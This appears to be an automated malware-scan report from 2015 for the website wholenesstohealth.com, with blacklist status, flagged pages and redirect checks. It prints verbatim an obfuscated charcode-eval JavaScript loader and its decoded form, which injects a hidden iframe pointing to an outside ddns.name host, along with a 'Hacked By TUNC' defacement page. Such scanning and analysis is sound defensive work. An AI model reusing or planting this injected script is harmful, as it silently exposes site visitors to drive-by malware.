Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wholenesstohealth.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wholenesstohealth.com/ | 200 OK Content-Length: 3038 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c64c55c76c66c70c72c68c63c4c58c58c68c73c4c68c55c67c59c5c73c74c58c73c5c61c69c4c70c62c70c21c73c63c58c19c7c-3c Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://javlprni.ddns.name/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://javlprni.ddns.name/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttrib <iframe src='http://javlprni.ddns.name/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
Deface/Content modification. The following signature was found: --Hacked By TUNC-- ...[1700 bytes skipped]... c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83'][0].split('c');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];}r=String;z=((e)?h:"");for(;595!=i;i+=1){j=i;if(e)s=s+r["fromC"+z](w[j]*1+42);}if(v&&e&&r)e(s);</script><html><head><title>--Hacked By TUNC--</title></head><body><center><font face="courier new"><body bgcolor="black"><font color="red"><p><p><p><br><img src="http://b1111.hizliresim.com/r/l/lvd4.png"></img><p><h2>**By TUNC**</h2><br><font color="grenn"><h3>----------------------------------------------------------------------------</h3><h3>|-www.Turkhackteam.net-|</h3><h3>------ ...[745 bytes skipped]... | ||
http://wholenesstohealth.com/test404page.js | 200 OK Content-Length: 2294 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c64c55c76c66c70c72c68c63c4c58c58c68c73c4c68c55c67c59c5c73c74c58c73c5c61c69c4c70c62c70c21c73c63c58c19c7c-3c Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://javlprni.ddns.name/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://javlprni.ddns.name/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttrib <iframe src='http://javlprni.ddns.name/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wholenesstohealth.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 31 Mar 2015 00:15:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: wholenesstohealth.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 31 Mar 2015 00:15:13 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: wholenesstohealth.com
Referer: http://www.google.com/search?q=wholenesstohealth.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wholenesstohealth.com
Referer: http://www.google.com/search?q=wholenesstohealth.com
Result:
The result is similar to the first query. There are no suspicious redirects found.